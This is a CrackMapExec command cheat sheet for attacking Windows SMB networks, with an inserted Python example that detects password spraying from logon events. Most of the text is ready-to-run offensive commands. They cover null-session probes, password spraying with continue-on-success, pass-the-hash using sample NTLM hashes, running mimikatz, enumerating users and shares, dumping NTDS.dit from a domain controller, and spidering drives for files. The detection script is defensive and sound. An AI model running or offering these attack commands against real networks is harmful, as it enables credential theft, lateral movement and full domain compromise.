CrackMapExec
# Usage:
crackmapexec smb 192.168.1.1/24
# NULL Sessions
crackmapexec smb <target(s)> -u '' -p ''
# Checking auth
crackmapexec smb 192.168.1.1/24 -u CoolAdmin -p ARealGoodPassword
# Passing the hash
crackmapexec smb 192.168.1.1/24 -u Administrator -H E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949B
# Running Modules
crackmapexec smb 192.168.1.1/24 -u Administrator -p Password1 -M mimikatz
# Enumerate shares
crackmapexec smb 192.168.1.1/24 -u Administrator -p Password1 --shares
# Enumerate domain users
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --users
# Authentication + Checking Credentials (Domain)
# Failed logins result in a [-]
# Successful logins result in a [+] Domain\Username:Password
# User/hash: pass the hash after obtaining credentials such as
Administrator:500:aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c:::
# You can use either the full hash or just the NT hash (second half)
cme smb 192.168.1.0/24 -u UserNAme -H 'LM:NT'
cme smb 192.168.1.0/24 -u UserNAme -H 'NTHASH'
cme smb 192.168.1.0/24 -u Administrator -H 'aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c'
cme smb 192.168.1.0/24 -u Administrator -H '13b29964cc2480b4ef454c59562e675c'
# Keep testing the remaining users and passwords after a valid login is found
cme smb 192.168.1.101 -u /path/to/users.txt -p Summer18 --continue-on-success
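Seen from the defending side, the run above shows up as one source failing logons for many different accounts in a short time. The following is an added example (not part of the original cheat sheet or of CrackMapExec) that flags that pattern; the record layout, sample events and thresholds are constructed assumptions, and only the event IDs 4625 (failed logon) and 4624 (successful logon) are real Windows Security values.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records (not real logs), simplified to
# (timestamp, Windows Security event ID, source IP, target user name).
EVENTS = [
    ("2024-01-10T09:00:01", 4625, "10.0.0.50", "alice"),
    ("2024-01-10T09:00:02", 4625, "10.0.0.50", "bob"),
    ("2024-01-10T09:00:03", 4624, "10.0.0.50", "carol"),
    ("2024-01-10T09:00:04", 4625, "10.0.0.50", "dave"),
    ("2024-01-10T09:00:05", 4625, "10.0.0.50", "erin"),
    # One user mistyping a password: many failures, but a single account.
    ("2024-01-10T09:05:00", 4625, "10.0.0.77", "frank"),
    ("2024-01-10T09:05:30", 4625, "10.0.0.77", "frank"),
    ("2024-01-10T09:06:00", 4624, "10.0.0.77", "frank"),
]


def find_sprays(events, window=timedelta(minutes=5), min_users=4):
    """Return {source_ip: {"failed": set, "succeeded": set}} for every source
    that failed logons for >= min_users distinct accounts inside one window."""
    by_src = defaultdict(list)
    for ts, event_id, src, user in events:
        by_src[src].append((datetime.fromisoformat(ts), event_id, user.lower()))

    findings = {}
    for src, rows in by_src.items():
        rows.sort()
        for i, (start, _, _) in enumerate(rows):
            in_window = [r for r in rows[i:] if r[0] - start <= window]
            # Count distinct accounts, not raw failures, so a single user
            # retrying a wrong password is not reported.
            failed = {u for _, eid, u in in_window if eid == 4625}
            if len(failed) >= min_users:
                # Successes from the same source in the same window are the
                # accounts whose password was most likely guessed.
                succeeded = {u for _, eid, u in in_window if eid == 4624}
                findings[src] = {"failed": failed, "succeeded": succeeded}
                break
    return findings


if __name__ == "__main__":
    for src, hit in find_sprays(EVENTS).items():
        print(src, sorted(hit["failed"]), sorted(hit["succeeded"]))
```

Accounts listed under `succeeded` are the ones to reset first, since the same source authenticated as them during the burst.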
# Dump the NTDS.dit file from the target DC using secretsdump.py
cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds
cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds vss
# Spider the C:\ drive for files with txt in the name. This will match user.txt and usertxt.html. The $ must be escaped
cme smb 10.10.10.178 -u USER -p PASSWORD --spider C\$ --pattern txt
# Mimikatz module
cme <protocol> <target(s)> -u Administrator -p 'P@ssw0rd' -M mimikatz -o COMMAND='privilege::debug'